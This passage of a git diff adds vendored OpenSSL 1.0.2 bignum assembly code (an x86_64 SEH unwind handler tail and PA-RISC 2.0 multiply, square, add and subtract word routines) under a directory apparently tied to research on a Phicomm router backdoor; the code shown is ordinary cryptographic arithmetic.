+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	mod_exp_512_se_handler,.-mod_exp_512_se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_mod_exp_512
+	.rva	.LSEH_end_mod_exp_512
+	.rva	.LSEH_info_mod_exp_512
+
+.section	.xdata
+.align	8
+.LSEH_info_mod_exp_512:
+	.byte	9,0,0,0
+	.rva	mod_exp_512_se_handler
+___
+}
+
+sub reg_part {
+my ($reg,$conv)=@_;
+    if ($reg =~ /%r[0-9]+/)	{ $reg .= $conv; }
+    elsif ($conv eq "b")	{ $reg =~ s/%[er]([^x]+)x?/%$1l/;	}
+    elsif ($conv eq "w")	{ $reg =~ s/%[er](.+)/%$1/;		}
+    elsif ($conv eq "d")	{ $reg =~ s/%[er](.+)/%e$1/;		}
+    return $reg;
+}
+
+$code =~ s/(%[a-z0-9]+)#([bwd])/reg_part($1,$2)/gem;
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+$code =~ s/(\(\+[^)]+\))/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/pa-risc2.s b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/pa-risc2.s
new file mode 100644
index 0000000..f3b1629
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/pa-risc2.s
@@ -0,0 +1,1618 @@
+;
+; PA-RISC 2.0 implementation of bn_asm code, based on the
+; 64-bit version of the code.  This code is effectively the
+; same as the 64-bit version except the register model is
+; slightly different given all values must be 32-bit between
+; function calls.  Thus the 64-bit return values are returned
+; in %ret0 and %ret1 vs just %ret0 as is done in 64-bit
+;
+;
+; This code is approximately 2x faster than the C version
+; for RSA/DSA.
+;
+; See http://devresource.hp.com/  for more details on the PA-RISC
+; architecture.  Also see the book "PA-RISC 2.0 Architecture"
+; by Gerry Kane for information on the instruction set architecture.
+;
+; Code written by Chris Ruemmler (with some help from the HP C
+; compiler).
+;
+; The code compiles with HP's assembler
+;
+
+	.level	2.0N
+	.space	$TEXT$
+	.subspa	$CODE$,QUAD=0,ALIGN=8,ACCESS=0x2c,CODE_ONLY
+
+;
+; Global Register definitions used for the routines.
+;
+; Some information about HP's runtime architecture for 32-bits.
+;
+; "Caller save" means the calling function must save the register
+; if it wants the register to be preserved.
+; "Callee save" means if a function uses the register, it must save
+; the value before using it.
+;
+; For the floating point registers 
+;
+;    "caller save" registers: fr4-fr11, fr22-fr31
+;    "callee save" registers: fr12-fr21
+;    "special" registers: fr0-fr3 (status and exception registers)
+;
+; For the integer registers
+;     value zero             :  r0
+;     "caller save" registers: r1,r19-r26
+;     "callee save" registers: r3-r18
+;     return register        :  r2  (rp)
+;     return values          ; r28,r29  (ret0,ret1)
+;     Stack pointer          ; r30  (sp) 
+;     millicode return ptr   ; r31  (also a caller save register)
+
+
+;
+; Arguments to the routines
+;
+r_ptr       .reg %r26
+a_ptr       .reg %r25
+b_ptr       .reg %r24
+num         .reg %r24
+n           .reg %r23
+
+;
+; Note that the "w" argument for bn_mul_add_words and bn_mul_words
+; is passed on the stack at a delta of -56 from the top of stack
+; as the routine is entered.
+;
+
+;
+; Globals used in some routines
+;
+
+top_overflow .reg %r23
+high_mask    .reg %r22    ; value 0xffffffff80000000L
+
+
+;------------------------------------------------------------------------------
+;
+; bn_mul_add_words
+;
+;BN_ULONG bn_mul_add_words(BN_ULONG *r_ptr, BN_ULONG *a_ptr, 
+;								int num, BN_ULONG w)
+;
+; arg0 = r_ptr
+; arg1 = a_ptr
+; arg3 = num
+; -56(sp) =  w
+;
+; Local register definitions
+;
+
+fm1          .reg %fr22
+fm           .reg %fr23
+ht_temp      .reg %fr24
+ht_temp_1    .reg %fr25
+lt_temp      .reg %fr26
+lt_temp_1    .reg %fr27
+fm1_1        .reg %fr28
+fm_1         .reg %fr29
+
+fw_h         .reg %fr7L
+fw_l         .reg %fr7R
+fw           .reg %fr7
+
+fht_0        .reg %fr8L
+flt_0        .reg %fr8R
+t_float_0    .reg %fr8
+
+fht_1        .reg %fr9L
+flt_1        .reg %fr9R
+t_float_1    .reg %fr9
+
+tmp_0        .reg %r31
+tmp_1        .reg %r21
+m_0          .reg %r20 
+m_1          .reg %r19 
+ht_0         .reg %r1  
+ht_1         .reg %r3
+lt_0         .reg %r4
+lt_1         .reg %r5
+m1_0         .reg %r6 
+m1_1         .reg %r7 
+rp_val       .reg %r8
+rp_val_1     .reg %r9
+
+bn_mul_add_words
+	.export	bn_mul_add_words,entry,NO_RELOCATION,LONG_RETURN
+	.proc
+	.callinfo frame=128
+    .entry
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3  
+    STD     %r4,8(%sp)          ; save r4  
+	NOP                         ; Needed to make the loop 16-byte aligned
+	NOP                         ; needed to make the loop 16-byte aligned
+
+    STD     %r5,16(%sp)         ; save r5  
+	NOP
+    STD     %r6,24(%sp)         ; save r6  
+    STD     %r7,32(%sp)         ; save r7  
+
+    STD     %r8,40(%sp)         ; save r8  
+    STD     %r9,48(%sp)         ; save r9  
+    COPY    %r0,%ret1           ; return 0 by default
+    DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32    
+
+    CMPIB,>= 0,num,bn_mul_add_words_exit  ; if (num <= 0) then exit
+	LDO     128(%sp),%sp        ; bump stack
+
+	;
+	; The loop is unrolled twice, so if there is only 1 number
+    ; then go straight to the cleanup code.
+	;
+	CMPIB,= 1,num,bn_mul_add_words_single_top
+	FLDD    -184(%sp),fw        ; (-56-128) load up w into fw (fw_h/fw_l)
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+	; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
+    ; two 32-bit mutiplies can be issued per cycle.
+    ; 
+bn_mul_add_words_unroll2
+
+    FLDD    0(a_ptr),t_float_0       ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    FLDD    8(a_ptr),t_float_1       ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    LDD     0(r_ptr),rp_val          ; rp[0]
+    LDD     8(r_ptr),rp_val_1        ; rp[1]
+
+    XMPYU   fht_0,fw_l,fm1           ; m1[0] = fht_0*fw_l
+    XMPYU   fht_1,fw_l,fm1_1         ; m1[1] = fht_1*fw_l
+    FSTD    fm1,-16(%sp)             ; -16(sp) = m1[0]
+    FSTD    fm1_1,-48(%sp)           ; -48(sp) = m1[1]
+
+    XMPYU   flt_0,fw_h,fm            ; m[0] = flt_0*fw_h
+    XMPYU   flt_1,fw_h,fm_1          ; m[1] = flt_1*fw_h
+    FSTD    fm,-8(%sp)               ; -8(sp) = m[0]
+    FSTD    fm_1,-40(%sp)            ; -40(sp) = m[1]
+
+    XMPYU   fht_0,fw_h,ht_temp       ; ht_temp   = fht_0*fw_h
+    XMPYU   fht_1,fw_h,ht_temp_1     ; ht_temp_1 = fht_1*fw_h
+    FSTD    ht_temp,-24(%sp)         ; -24(sp)   = ht_temp
+    FSTD    ht_temp_1,-56(%sp)       ; -56(sp)   = ht_temp_1
+
+    XMPYU   flt_0,fw_l,lt_temp       ; lt_temp = lt*fw_l
+    XMPYU   flt_1,fw_l,lt_temp_1     ; lt_temp = lt*fw_l
+    FSTD    lt_temp,-32(%sp)         ; -32(sp) = lt_temp 
+    FSTD    lt_temp_1,-64(%sp)       ; -64(sp) = lt_temp_1 
+
+    LDD     -8(%sp),m_0              ; m[0] 
+    LDD     -40(%sp),m_1             ; m[1]
+    LDD     -16(%sp),m1_0            ; m1[0]
+    LDD     -48(%sp),m1_1            ; m1[1]
+
+    LDD     -24(%sp),ht_0            ; ht[0]
+    LDD     -56(%sp),ht_1            ; ht[1]
+    ADD,L   m1_0,m_0,tmp_0           ; tmp_0 = m[0] + m1[0]; 
+    ADD,L   m1_1,m_1,tmp_1           ; tmp_1 = m[1] + m1[1]; 
+
+    LDD     -32(%sp),lt_0            
+    LDD     -64(%sp),lt_1            
+    CMPCLR,*>>= tmp_0,m1_0, %r0      ; if (m[0] < m1[0])
+    ADD,L   ht_0,top_overflow,ht_0   ; ht[0] += (1<<32)
+
+    CMPCLR,*>>= tmp_1,m1_1,%r0       ; if (m[1] < m1[1])
+    ADD,L   ht_1,top_overflow,ht_1   ; ht[1] += (1<<32)
+    EXTRD,U tmp_0,31,32,m_0          ; m[0]>>32  
+    DEPD,Z  tmp_0,31,32,m1_0         ; m1[0] = m[0]<<32 
+
+    EXTRD,U tmp_1,31,32,m_1          ; m[1]>>32  
+    DEPD,Z  tmp_1,31,32,m1_1         ; m1[1] = m[1]<<32 
+    ADD,L   ht_0,m_0,ht_0            ; ht[0]+= (m[0]>>32)
+    ADD,L   ht_1,m_1,ht_1            ; ht[1]+= (m[1]>>32)
+
+    ADD     lt_0,m1_0,lt_0           ; lt[0] = lt[0]+m1[0];
+	ADD,DC  ht_0,%r0,ht_0            ; ht[0]++
+    ADD     lt_1,m1_1,lt_1           ; lt[1] = lt[1]+m1[1];
+    ADD,DC  ht_1,%r0,ht_1            ; ht[1]++
+
+    ADD    %ret1,lt_0,lt_0           ; lt[0] = lt[0] + c;
+	ADD,DC  ht_0,%r0,ht_0            ; ht[0]++
+    ADD     lt_0,rp_val,lt_0         ; lt[0] = lt[0]+rp[0]
+    ADD,DC  ht_0,%r0,ht_0            ; ht[0]++
+
+	LDO    -2(num),num               ; num = num - 2;
+    ADD     ht_0,lt_1,lt_1           ; lt[1] = lt[1] + ht_0 (c);
+    ADD,DC  ht_1,%r0,ht_1            ; ht[1]++
+    STD     lt_0,0(r_ptr)            ; rp[0] = lt[0]
+
+    ADD     lt_1,rp_val_1,lt_1       ; lt[1] = lt[1]+rp[1]
+    ADD,DC  ht_1,%r0,%ret1           ; ht[1]++
+    LDO     16(a_ptr),a_ptr          ; a_ptr += 2
+
+    STD     lt_1,8(r_ptr)            ; rp[1] = lt[1]
+	CMPIB,<= 2,num,bn_mul_add_words_unroll2 ; go again if more to do
+    LDO     16(r_ptr),r_ptr          ; r_ptr += 2
+
+    CMPIB,=,N 0,num,bn_mul_add_words_exit ; are we done, or cleanup last one
+
+	;
+	; Top of loop aligned on 64-byte boundary
+	;
+bn_mul_add_words_single_top
+    FLDD    0(a_ptr),t_float_0        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    LDD     0(r_ptr),rp_val           ; rp[0]
+    LDO     8(a_ptr),a_ptr            ; a_ptr++
+    XMPYU   fht_0,fw_l,fm1            ; m1 = ht*fw_l
+    FSTD    fm1,-16(%sp)              ; -16(sp) = m1
+    XMPYU   flt_0,fw_h,fm             ; m = lt*fw_h
+    FSTD    fm,-8(%sp)                ; -8(sp) = m
+    XMPYU   fht_0,fw_h,ht_temp        ; ht_temp = ht*fw_h
+    FSTD    ht_temp,-24(%sp)          ; -24(sp) = ht
+    XMPYU   flt_0,fw_l,lt_temp        ; lt_temp = lt*fw_l
+    FSTD    lt_temp,-32(%sp)          ; -32(sp) = lt 
+
+    LDD     -8(%sp),m_0               
+    LDD    -16(%sp),m1_0              ; m1 = temp1 
+    ADD,L   m_0,m1_0,tmp_0            ; tmp_0 = m + m1; 
+    LDD     -24(%sp),ht_0             
+    LDD     -32(%sp),lt_0             
+
+    CMPCLR,*>>= tmp_0,m1_0,%r0        ; if (m < m1)
+    ADD,L   ht_0,top_overflow,ht_0    ; ht += (1<<32)
+
+    EXTRD,U tmp_0,31,32,m_0           ; m>>32  
+    DEPD,Z  tmp_0,31,32,m1_0          ; m1 = m<<32 
+
+    ADD,L   ht_0,m_0,ht_0             ; ht+= (m>>32)
+    ADD     lt_0,m1_0,tmp_0           ; tmp_0 = lt+m1;
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+    ADD     %ret1,tmp_0,lt_0          ; lt = lt + c;
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+    ADD     lt_0,rp_val,lt_0          ; lt = lt+rp[0]
+    ADD,DC  ht_0,%r0,%ret1            ; ht++
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt
+
+bn_mul_add_words_exit
+    .EXIT
+	
+    EXTRD,U %ret1,31,32,%ret0         ; for 32-bit, return in ret0/ret1
+    LDD     -80(%sp),%r9              ; restore r9  
+    LDD     -88(%sp),%r8              ; restore r8  
+    LDD     -96(%sp),%r7              ; restore r7  
+    LDD     -104(%sp),%r6             ; restore r6  
+    LDD     -112(%sp),%r5             ; restore r5  
+    LDD     -120(%sp),%r4             ; restore r4  
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3             ; restore r3
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+;----------------------------------------------------------------------------
+;
+;BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
+;
+; arg0 = rp
+; arg1 = ap
+; arg3 = num
+; w on stack at -56(sp)
+
+bn_mul_words
+	.proc
+	.callinfo frame=128
+    .entry
+	.EXPORT	bn_mul_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3  
+    STD     %r4,8(%sp)          ; save r4  
+	NOP
+    STD     %r5,16(%sp)         ; save r5  
+
+    STD     %r6,24(%sp)         ; save r6  
+    STD     %r7,32(%sp)         ; save r7  
+    COPY    %r0,%ret1           ; return 0 by default
+    DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32    
+
+    CMPIB,>= 0,num,bn_mul_words_exit
+	LDO     128(%sp),%sp    ; bump stack
+
+	;
+	; See if only 1 word to do, thus just do cleanup
+	;
+	CMPIB,= 1,num,bn_mul_words_single_top
+	FLDD    -184(%sp),fw        ; (-56-128) load up w into fw (fw_h/fw_l)
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+	; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
+    ; two 32-bit mutiplies can be issued per cycle.
+    ; 
+bn_mul_words_unroll2
+
+    FLDD    0(a_ptr),t_float_0        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    FLDD    8(a_ptr),t_float_1        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    XMPYU   fht_0,fw_l,fm1            ; m1[0] = fht_0*fw_l
+    XMPYU   fht_1,fw_l,fm1_1          ; m1[1] = ht*fw_l
+
+    FSTD    fm1,-16(%sp)              ; -16(sp) = m1
+    FSTD    fm1_1,-48(%sp)            ; -48(sp) = m1
+    XMPYU   flt_0,fw_h,fm             ; m = lt*fw_h
+    XMPYU   flt_1,fw_h,fm_1           ; m = lt*fw_h
+
+    FSTD    fm,-8(%sp)                ; -8(sp) = m
+    FSTD    fm_1,-40(%sp)             ; -40(sp) = m
+    XMPYU   fht_0,fw_h,ht_temp        ; ht_temp = fht_0*fw_h
+    XMPYU   fht_1,fw_h,ht_temp_1      ; ht_temp = ht*fw_h
+
+    FSTD    ht_temp,-24(%sp)          ; -24(sp) = ht
+    FSTD    ht_temp_1,-56(%sp)        ; -56(sp) = ht
+    XMPYU   flt_0,fw_l,lt_temp        ; lt_temp = lt*fw_l
+    XMPYU   flt_1,fw_l,lt_temp_1      ; lt_temp = lt*fw_l
+
+    FSTD    lt_temp,-32(%sp)          ; -32(sp) = lt 
+    FSTD    lt_temp_1,-64(%sp)        ; -64(sp) = lt 
+    LDD     -8(%sp),m_0               
+    LDD     -40(%sp),m_1              
+
+    LDD    -16(%sp),m1_0              
+    LDD    -48(%sp),m1_1              
+    LDD     -24(%sp),ht_0             
+    LDD     -56(%sp),ht_1             
+
+    ADD,L   m1_0,m_0,tmp_0            ; tmp_0 = m + m1; 
+    ADD,L   m1_1,m_1,tmp_1            ; tmp_1 = m + m1; 
+    LDD     -32(%sp),lt_0             
+    LDD     -64(%sp),lt_1             
+
+    CMPCLR,*>>= tmp_0,m1_0, %r0       ; if (m < m1)
+    ADD,L   ht_0,top_overflow,ht_0    ; ht += (1<<32)
+    CMPCLR,*>>= tmp_1,m1_1,%r0        ; if (m < m1)
+    ADD,L   ht_1,top_overflow,ht_1    ; ht += (1<<32)
+
+    EXTRD,U tmp_0,31,32,m_0           ; m>>32  
+    DEPD,Z  tmp_0,31,32,m1_0          ; m1 = m<<32 
+    EXTRD,U tmp_1,31,32,m_1           ; m>>32  
+    DEPD,Z  tmp_1,31,32,m1_1          ; m1 = m<<32 
+
+    ADD,L   ht_0,m_0,ht_0             ; ht+= (m>>32)
+    ADD,L   ht_1,m_1,ht_1             ; ht+= (m>>32)
+    ADD     lt_0,m1_0,lt_0            ; lt = lt+m1;
+	ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    ADD     lt_1,m1_1,lt_1            ; lt = lt+m1;
+    ADD,DC  ht_1,%r0,ht_1             ; ht++
+    ADD    %ret1,lt_0,lt_0            ; lt = lt + c (ret1);
+	ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    ADD     ht_0,lt_1,lt_1            ; lt = lt + c (ht_0)
+    ADD,DC  ht_1,%r0,ht_1             ; ht++
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt
+    STD     lt_1,8(r_ptr)             ; rp[1] = lt
+
+	COPY    ht_1,%ret1                ; carry = ht
+	LDO    -2(num),num                ; num = num - 2;
+    LDO     16(a_ptr),a_ptr           ; ap += 2
+	CMPIB,<= 2,num,bn_mul_words_unroll2
+    LDO     16(r_ptr),r_ptr           ; rp++
+
+    CMPIB,=,N 0,num,bn_mul_words_exit ; are we done?
+
+	;
+	; Top of loop aligned on 64-byte boundary
+	;
+bn_mul_words_single_top
+    FLDD    0(a_ptr),t_float_0        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+
+    XMPYU   fht_0,fw_l,fm1            ; m1 = ht*fw_l
+    FSTD    fm1,-16(%sp)              ; -16(sp) = m1
+    XMPYU   flt_0,fw_h,fm             ; m = lt*fw_h
+    FSTD    fm,-8(%sp)                ; -8(sp) = m
+    XMPYU   fht_0,fw_h,ht_temp        ; ht_temp = ht*fw_h
+    FSTD    ht_temp,-24(%sp)          ; -24(sp) = ht
+    XMPYU   flt_0,fw_l,lt_temp        ; lt_temp = lt*fw_l
+    FSTD    lt_temp,-32(%sp)          ; -32(sp) = lt 
+
+    LDD     -8(%sp),m_0               
+    LDD    -16(%sp),m1_0              
+    ADD,L   m_0,m1_0,tmp_0            ; tmp_0 = m + m1; 
+    LDD     -24(%sp),ht_0             
+    LDD     -32(%sp),lt_0             
+
+    CMPCLR,*>>= tmp_0,m1_0,%r0        ; if (m < m1)
+    ADD,L   ht_0,top_overflow,ht_0    ; ht += (1<<32)
+
+    EXTRD,U tmp_0,31,32,m_0           ; m>>32  
+    DEPD,Z  tmp_0,31,32,m1_0          ; m1 = m<<32 
+
+    ADD,L   ht_0,m_0,ht_0             ; ht+= (m>>32)
+    ADD     lt_0,m1_0,lt_0            ; lt= lt+m1;
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    ADD     %ret1,lt_0,lt_0           ; lt = lt + c;
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    COPY    ht_0,%ret1                ; copy carry
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt
+
+bn_mul_words_exit
+    .EXIT
+    EXTRD,U %ret1,31,32,%ret0           ; for 32-bit, return in ret0/ret1
+    LDD     -96(%sp),%r7              ; restore r7  
+    LDD     -104(%sp),%r6             ; restore r6  
+    LDD     -112(%sp),%r5             ; restore r5  
+    LDD     -120(%sp),%r4             ; restore r4  
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3             ; restore r3
+	.PROCEND	
+
+;----------------------------------------------------------------------------
+;
+;void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
+;
+; arg0 = rp
+; arg1 = ap
+; arg2 = num
+;
+
+bn_sqr_words
+	.proc
+	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_sqr_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3  
+    STD     %r4,8(%sp)          ; save r4  
+	NOP
+    STD     %r5,16(%sp)         ; save r5  
+
+    CMPIB,>= 0,num,bn_sqr_words_exit
+	LDO     128(%sp),%sp       ; bump stack
+
+	;
+	; If only 1, the goto straight to cleanup
+	;
+	CMPIB,= 1,num,bn_sqr_words_single_top
+    DEPDI,Z -1,32,33,high_mask   ; Create Mask 0xffffffff80000000L
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+
+bn_sqr_words_unroll2
+    FLDD    0(a_ptr),t_float_0        ; a[0]
+    FLDD    8(a_ptr),t_float_1        ; a[1]
+    XMPYU   fht_0,flt_0,fm            ; m[0]
+    XMPYU   fht_1,flt_1,fm_1          ; m[1]
+
+    FSTD    fm,-24(%sp)               ; store m[0]
+    FSTD    fm_1,-56(%sp)             ; store m[1]
+    XMPYU   flt_0,flt_0,lt_temp       ; lt[0]
+    XMPYU   flt_1,flt_1,lt_temp_1     ; lt[1]
+
+    FSTD    lt_temp,-16(%sp)          ; store lt[0]
+    FSTD    lt_temp_1,-48(%sp)        ; store lt[1]
+    XMPYU   fht_0,fht_0,ht_temp       ; ht[0]
+    XMPYU   fht_1,fht_1,ht_temp_1     ; ht[1]
+
+    FSTD    ht_temp,-8(%sp)           ; store ht[0]
+    FSTD    ht_temp_1,-40(%sp)        ; store ht[1]
+    LDD     -24(%sp),m_0             
+    LDD     -56(%sp),m_1              
+
+    AND     m_0,high_mask,tmp_0       ; m[0] & Mask
+    AND     m_1,high_mask,tmp_1       ; m[1] & Mask
+    DEPD,Z  m_0,30,31,m_0             ; m[0] << 32+1
+    DEPD,Z  m_1,30,31,m_1             ; m[1] << 32+1
+
+    LDD     -16(%sp),lt_0        
+    LDD     -48(%sp),lt_1        
+    EXTRD,U tmp_0,32,33,tmp_0         ; tmp_0 = m[0]&Mask >> 32-1
+    EXTRD,U tmp_1,32,33,tmp_1         ; tmp_1 = m[1]&Mask >> 32-1
+
+    LDD     -8(%sp),ht_0            
+    LDD     -40(%sp),ht_1           
+    ADD,L   ht_0,tmp_0,ht_0           ; ht[0] += tmp_0
+    ADD,L   ht_1,tmp_1,ht_1           ; ht[1] += tmp_1
+
+    ADD     lt_0,m_0,lt_0             ; lt = lt+m
+    ADD,DC  ht_0,%r0,ht_0             ; ht[0]++
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt[0]
+    STD     ht_0,8(r_ptr)             ; rp[1] = ht[1]
+
+    ADD     lt_1,m_1,lt_1             ; lt = lt+m
+    ADD,DC  ht_1,%r0,ht_1             ; ht[1]++
+    STD     lt_1,16(r_ptr)            ; rp[2] = lt[1]
+    STD     ht_1,24(r_ptr)            ; rp[3] = ht[1]
+
+	LDO    -2(num),num                ; num = num - 2;
+    LDO     16(a_ptr),a_ptr           ; ap += 2
+	CMPIB,<= 2,num,bn_sqr_words_unroll2
+    LDO     32(r_ptr),r_ptr           ; rp += 4
+
+    CMPIB,=,N 0,num,bn_sqr_words_exit ; are we done?
+
+	;
+	; Top of loop aligned on 64-byte boundary
+	;
+bn_sqr_words_single_top
+    FLDD    0(a_ptr),t_float_0        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+
+    XMPYU   fht_0,flt_0,fm            ; m
+    FSTD    fm,-24(%sp)               ; store m
+
+    XMPYU   flt_0,flt_0,lt_temp       ; lt
+    FSTD    lt_temp,-16(%sp)          ; store lt
+
+    XMPYU   fht_0,fht_0,ht_temp       ; ht
+    FSTD    ht_temp,-8(%sp)           ; store ht
+
+    LDD     -24(%sp),m_0              ; load m
+    AND     m_0,high_mask,tmp_0       ; m & Mask
+    DEPD,Z  m_0,30,31,m_0             ; m << 32+1
+    LDD     -16(%sp),lt_0             ; lt
+
+    LDD     -8(%sp),ht_0              ; ht
+    EXTRD,U tmp_0,32,33,tmp_0         ; tmp_0 = m&Mask >> 32-1
+    ADD     m_0,lt_0,lt_0             ; lt = lt+m
+    ADD,L   ht_0,tmp_0,ht_0           ; ht += tmp_0
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt
+    STD     ht_0,8(r_ptr)             ; rp[1] = ht
+
+bn_sqr_words_exit
+    .EXIT
+    LDD     -112(%sp),%r5       ; restore r5  
+    LDD     -120(%sp),%r4       ; restore r4  
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3 
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+
+;----------------------------------------------------------------------------
+;
+;BN_ULONG bn_add_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
+;
+; arg0 = rp 
+; arg1 = ap
+; arg2 = bp 
+; arg3 = n
+
+t  .reg %r22
+b  .reg %r21
+l  .reg %r20
+
+bn_add_words
+	.proc
+    .entry
+	.callinfo
+	.EXPORT	bn_add_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+	.align 64
+
+    CMPIB,>= 0,n,bn_add_words_exit
+    COPY    %r0,%ret1           ; return 0 by default
+
+	;
+	; If 2 or more numbers do the loop
+	;
+	CMPIB,= 1,n,bn_add_words_single_top
+	NOP
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+bn_add_words_unroll2
+	LDD     0(a_ptr),t
+	LDD     0(b_ptr),b
+	ADD     t,%ret1,t                    ; t = t+c;
+	ADD,DC  %r0,%r0,%ret1                ; set c to carry
+	ADD     t,b,l                        ; l = t + b[0]
+	ADD,DC  %ret1,%r0,%ret1              ; c+= carry
+	STD     l,0(r_ptr)
+
+	LDD     8(a_ptr),t
+	LDD     8(b_ptr),b
+	ADD     t,%ret1,t                     ; t = t+c;
+	ADD,DC  %r0,%r0,%ret1                 ; set c to carry
+	ADD     t,b,l                         ; l = t + b[0]
+	ADD,DC  %ret1,%r0,%ret1               ; c+= carry
+	STD     l,8(r_ptr)
+
+	LDO     -2(n),n
+	LDO     16(a_ptr),a_ptr
+	LDO     16(b_ptr),b_ptr
+
+	CMPIB,<= 2,n,bn_add_words_unroll2
+	LDO     16(r_ptr),r_ptr
+
+    CMPIB,=,N 0,n,bn_add_words_exit ; are we done?
+
+bn_add_words_single_top
+	LDD     0(a_ptr),t
+	LDD     0(b_ptr),b
+
+	ADD     t,%ret1,t                 ; t = t+c;
+	ADD,DC  %r0,%r0,%ret1             ; set c to carry (could use CMPCLR??)
+	ADD     t,b,l                     ; l = t + b[0]
+	ADD,DC  %ret1,%r0,%ret1           ; c+= carry
+	STD     l,0(r_ptr)
+
+bn_add_words_exit
+    .EXIT
+    BVE     (%rp)
+    EXTRD,U %ret1,31,32,%ret0           ; for 32-bit, return in ret0/ret1
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+;----------------------------------------------------------------------------
+;
+;BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
+;
+; arg0 = rp 
+; arg1 = ap
+; arg2 = bp 
+; arg3 = n
+
+t1       .reg %r22
+t2       .reg %r21
+sub_tmp1 .reg %r20
+sub_tmp2 .reg %r19
+
+
+bn_sub_words
+	.proc
+	.callinfo 
+	.EXPORT	bn_sub_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+
+    CMPIB,>=  0,n,bn_sub_words_exit
+    COPY    %r0,%ret1           ; return 0 by default
+
+	;
+	; If 2 or more numbers do the loop
+	;
+	CMPIB,= 1,n,bn_sub_words_single_top
+	NOP
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+bn_sub_words_unroll2
+	LDD     0(a_ptr),t1
+	LDD     0(b_ptr),t2
+	SUB     t1,t2,sub_tmp1           ; t3 = t1-t2; 
+	SUB     sub_tmp1,%ret1,sub_tmp1  ; t3 = t3- c; 
+
+	CMPCLR,*>> t1,t2,sub_tmp2        ; clear if t1 > t2
+	LDO      1(%r0),sub_tmp2
+	
+	CMPCLR,*= t1,t2,%r0
+	COPY    sub_tmp2,%ret1
+	STD     sub_tmp1,0(r_ptr)
+
+	LDD     8(a_ptr),t1
+	LDD     8(b_ptr),t2
+	SUB     t1,t2,sub_tmp1            ; t3 = t1-t2; 
+	SUB     sub_tmp1,%ret1,sub_tmp1   ; t3 = t3- c; 
+	CMPCLR,*>> t1,t2,sub_tmp2         ; clear if t1 > t2
+	LDO      1(%r0),sub_tmp2
+	
+	CMPCLR,*= t1,t2,%r0
+	COPY    sub_tmp2,%ret1
+	STD     sub_tmp1,8(r_ptr)
+
+	LDO     -2(n),n
